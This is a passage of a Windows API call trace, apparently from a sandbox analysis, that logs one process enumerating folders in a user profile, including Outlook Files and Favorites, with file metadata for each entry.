(in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x546d3f30, ftCreationTime.dwHighDateTime=0x1d5bc7c, ftLastAccessTime.dwLowDateTime=0x357a4ae0, ftLastAccessTime.dwHighDateTime=0x1d5b5b6, ftLastWriteTime.dwLowDateTime=0x357a4ae0, ftLastWriteTime.dwHighDateTime=0x1d5b5b6, nFileSizeHigh=0x0, nFileSizeLow=0x11003, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wNZ Bd.ods", cAlternateFileName="WNZBD~1.ODS")) returned 1 [0091.045] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x546d3f30, ftCreationTime.dwHighDateTime=0x1d5bc7c, ftLastAccessTime.dwLowDateTime=0x357a4ae0, ftLastAccessTime.dwHighDateTime=0x1d5b5b6, ftLastWriteTime.dwLowDateTime=0x357a4ae0, ftLastWriteTime.dwHighDateTime=0x1d5b5b6, nFileSizeHigh=0x0, nFileSizeLow=0x11003, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wNZ Bd.ods", cAlternateFileName="WNZBD~1.ODS")) returned 0 [0091.045] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e28 | out: hHeap=0x680000) returned 1 [0091.045] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.045] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0091.045] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0091.045] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.045] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.045] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.045] PathFindFileNameW (pszPath="") returned="" [0091.045] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x546d3f30, ftCreationTime.dwHighDateTime=0x1d5bc7c, ftLastAccessTime.dwLowDateTime=0x357a4ae0, ftLastAccessTime.dwHighDateTime=0x1d5b5b6, ftLastWriteTime.dwLowDateTime=0x357a4ae0, ftLastWriteTime.dwHighDateTime=0x1d5b5b6, nFileSizeHigh=0x0, nFileSizeLow=0x11003, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wNZ Bd.ods", cAlternateFileName="WNZBD~1.ODS")) returned 0xffffffff [0091.045] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.046] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0091.046] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0091.046] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.046] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.046] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.046] PathFindFileNameW (pszPath="") returned="" [0091.046] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x546d3f30, ftCreationTime.dwHighDateTime=0x1d5bc7c, ftLastAccessTime.dwLowDateTime=0x357a4ae0, ftLastAccessTime.dwHighDateTime=0x1d5b5b6, ftLastWriteTime.dwLowDateTime=0x357a4ae0, ftLastWriteTime.dwHighDateTime=0x1d5b5b6, nFileSizeHigh=0x0, nFileSizeLow=0x11003, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wNZ Bd.ods", cAlternateFileName="WNZBD~1.ODS")) returned 0xffffffff [0091.046] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.046] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0091.046] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0091.046] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.046] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.046] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.046] PathFindFileNameW (pszPath="") returned="" [0091.046] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.047] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.047] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0091.047] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0091.048] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0091.048] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0091.048] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.048] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.048] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0091.048] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0091.048] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.048] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.048] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.048] PathFindFileNameW (pszPath="") returned="" [0091.048] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0091.048] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.048] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0091.048] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0091.048] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.048] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.048] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.048] PathFindFileNameW (pszPath="") returned="" [0091.049] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.049] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.049] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0091.049] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0091.049] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.049] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.049] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0091.049] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0091.049] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.049] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.049] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.049] PathFindFileNameW (pszPath="") returned="" [0091.049] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.050] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.050] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0091.050] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0091.050] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0091.050] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0091.050] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.050] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.050] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0091.050] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0091.050] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.050] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.050] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.050] PathFindFileNameW (pszPath="") returned="" [0091.050] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.052] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.052] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0091.052] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0091.052] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0091.052] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0091.052] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0091.052] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0091.052] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.053] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.053] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0091.053] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0091.053] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.053] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.053] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.053] PathFindFileNameW (pszPath="") returned="" [0091.053] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.055] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.055] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0091.055] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0091.055] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, 